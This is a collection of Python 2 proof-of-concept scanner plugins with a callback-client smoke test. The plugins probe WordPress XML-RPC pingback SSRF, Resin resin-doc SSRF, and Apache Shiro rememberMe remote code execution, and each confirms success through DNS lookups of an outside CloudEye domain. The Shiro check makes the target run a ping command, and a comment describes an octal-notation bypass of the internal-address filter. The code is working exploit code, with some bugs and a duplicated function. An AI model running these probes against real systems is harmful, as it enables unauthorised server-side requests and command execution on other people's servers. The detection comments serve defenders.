def poc(url):
    """Blind-SSRF probe of the WordPress XML-RPC ``pingback.ping`` method.

    A pingback is POSTed to ``<url>/xmlrpc.php`` whose *source* URL is a
    freshly generated CloudEye domain and whose *target* is ``<url>/?p=1``.
    Success is judged solely by an out-of-band DNS lookup of that domain;
    nothing in the HTTP response is inspected.

    Args:
        url: host or URL of the site under test. ``http://`` is prepended
            when no scheme is present.

    Returns:
        True when CloudEye records a DNS query for the generated domain,
        otherwise None -- including on any request failure, since every
        exception is swallowed.
    """
    if '://' not in url:
        url = 'http://' + url
    targeturl = url.rstrip('/') + "/xmlrpc.php"
    c = CloudEye()
    # Random subdomain tagged 'wpssrf'; a DNS hit on it is the only success signal.
    dst = c.getRandomDomain('wpssrf')
    # First URL field is the SSRF destination, in the form
    # (http[s]://IP|DOMAIN)[:(80|8080|443)].
    # Only those three ports are accepted; external addresses go through while
    # internal addresses are filtered (the author notes octal notation gets
    # past the filter for the 10.x range).
    # Second URL field must be a post that really exists on the site; ?p=1 is
    # used so it adapts automatically.
    payload = """
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://{target}/</string></value></param>
<param><value><string>{victim}?p=1</string></value></param>
</params>
</methodCall>""".format(target=dst, victim=url.rstrip('/') + '/')
    header = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0', 'Content-Type': 'text/xml'}
    try:
        # Success cannot be read from the response body; the only evidence is
        # the out-of-band DNS query. Server-side, the observable artefact is a
        # text/xml POST to /xmlrpc.php carrying pingback.ping with a source
        # host that is not a real site -- that is the request to alert on.
        # NOTE(review): req_timeout is not defined in this block -- presumably
        # a module-level setting; confirm it is in scope.
        requests.post(targeturl, data=payload, headers=header, timeout=req_timeout)
        if c.verifyDNS(delay=3):
            return True
    except Exception, e:  # Python 2 syntax; 'e' is never used
        pass
def poc(url):
    """Blind-SSRF probe of Resin's bundled ``resin-doc`` tutorial endpoint.

    For every base path yielded by ``iterate_path(url)`` a GET is sent to
    ``/resin-doc/resource/tutorial/jndi-appconfig/test`` with ``inputFile``
    pointing at a freshly generated CloudEye domain. The server fetching
    that URL produces a DNS query, which is the only success signal.

    Args:
        url: host or URL of the site under test. ``http://`` is prepended
            when no scheme is present.

    Returns:
        The first base path for which CloudEye records a DNS hit, otherwise
        None (request errors are swallowed and the next path is tried).
    """
    url = url if '://' in url else 'http://' + url
    # NOTE(review): debug output left in; iterate_path() is evaluated a
    # second time for the loop below.
    print iterate_path(url)
    for each in iterate_path(url):
        try:
            # A fresh marker domain per candidate path, so a hit identifies
            # which path was responsible.
            c = CloudEye()
            domain = c.getRandomDomain('resin')
            # Server-side this is a GET to the resin-doc tutorial path whose
            # inputFile parameter names an external host -- the request to
            # alert on; shipping resin-doc on a production host is the risk.
            payload = '/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://%s' % domain
            target = each.rstrip('/') + payload
            requests.get(target, timeout=5)
            if c.verifyDNS(delay=3):
                return each
        except Exception:
            pass
def poc(url):
    """Out-of-band check of the Apache Shiro ``rememberMe`` cookie issue.

    A payload built by ``generator()`` from a ping command is sent in the
    ``rememberMe`` cookie; the command resolves a freshly generated CloudEye
    domain, so a DNS query for that domain proves the command ran on the
    target.

    Args:
        url: host or URL of the site under test. Without a scheme,
            ``https://`` is used when ``:443`` appears in it, else ``http://``.

    Returns:
        ``url`` followed by ``' - <ip>'`` for each client IP found in the DNS
        log when the domain was resolved, otherwise None (all exceptions are
        swallowed).
    """
    if '://' not in url:
        target = 'https://%s' % url if ':443' in url else 'http://%s' % url
    else:
        target = url
    try:
        cloudeye = CloudEye()
        domain = cloudeye.getRandomDomain('shiro')  # set up the DNS marker domain
        # Command run on the target; -n / -c cover Windows and Unix ping respectively.
        rce_command = 'ping -n 3 %s || ping -c 3 %s' % (domain, domain)
        # NOTE(review): generator and JAR_FILE are not defined in this block --
        # presumably module-level helpers; confirm they are in scope.
        payload = generator(rce_command, JAR_FILE)  # build the payload
        # Send the verification request. Server-side, an oversized or
        # malformed rememberMe cookie on an otherwise anonymous GET is the
        # artefact to alert on.
        requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10)
        dnslog = cloudeye.getDnsRecord(delay=2)
        if domain in dnslog:
            msg = url
            for each in re.findall(r'client (.*)#', dnslog):  # extract the egress IP(s)
                msg += ' - ' + each
            return msg
    except Exception, e:  # Python 2 syntax; 'e' is never used
        pass
def poc(url):
    """Blind-SSRF probe of the WordPress XML-RPC ``pingback.ping`` method.

    A pingback is POSTed to ``<url>/xmlrpc.php`` whose *source* URL is a
    freshly generated CloudEye domain and whose *target* is ``<url>/?p=1``.
    Success is judged solely by an out-of-band DNS lookup of that domain;
    nothing in the HTTP response is inspected.

    Args:
        url: host or URL of the site under test. ``http://`` is prepended
            when no scheme is present.

    Returns:
        True when CloudEye records a DNS query for the generated domain,
        otherwise None -- including on any request failure, since every
        exception is swallowed.
    """
    if '://' not in url:
        url = 'http://' + url
    targeturl = url.rstrip('/') + "/xmlrpc.php"
    c = CloudEye()
    # Random subdomain tagged 'wpssrf'; a DNS hit on it is the only success signal.
    dst = c.getRandomDomain('wpssrf')
    # First URL field is the SSRF destination, in the form
    # (http[s]://IP|DOMAIN)[:(80|8080|443)].
    # Only those three ports are accepted; external addresses go through while
    # internal addresses are filtered (the author notes octal notation gets
    # past the filter for the 10.x range).
    # Second URL field must be a post that really exists on the site; ?p=1 is
    # used so it adapts automatically.
    payload = """
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://{target}/</string></value></param>
<param><value><string>{victim}?p=1</string></value></param>
</params>
</methodCall>""".format(target=dst, victim=url.rstrip('/') + '/')
    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
        'Content-Type': 'text/xml'
    }
    try:
        # Success cannot be read from the response body; the only evidence is
        # the out-of-band DNS query. Server-side, the observable artefact is a
        # text/xml POST to /xmlrpc.php carrying pingback.ping with a source
        # host that is not a real site -- that is the request to alert on.
        # NOTE(review): req_timeout is not defined in this block -- presumably
        # a module-level setting; confirm it is in scope.
        requests.post(targeturl, data=payload, headers=header, timeout=req_timeout)
        if c.verifyDNS(delay=3):
            return True
    except Exception, e:  # Python 2 syntax; 'e' is never used
        pass
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
"""
Author: rivir
Date: 2020/2/22

Smoke test for the CloudEye out-of-band callback client: generates a marker
domain, triggers one HTTP request to it, then prints what the DNS and HTTP
verification calls and the raw record getters return.
"""
import sys
sys.path.append('../')
from plugin.cloudeye import CloudEye

c = CloudEye()
# Random subdomain tagged 'cdxy' used as the callback marker.
a = c.getRandomDomain('cdxy')
try:
    # NOTE(review): 'requests' is not imported anywhere in this script (only
    # sys and CloudEye are), so this raises NameError, which the bare
    # 'except Exception' below hides; the HTTP callback is therefore never
    # exercised. Confirm the intended import.
    requests.get('http://' + a, timeout=1)
except Exception:
    pass
# Python 2 print statements; delay=0 means no wait before polling the records.
print c.verifyDNS(delay=0)
print c.verifyHTTP(delay=0)
print c.getDnsRecord(delay=0)
print c.getHttpRecord(delay=0)

if __name__ == "__main__":
    # NOTE(review): no main() is defined in this script; the work above already
    # ran at import time, so this call fails with NameError.
    main()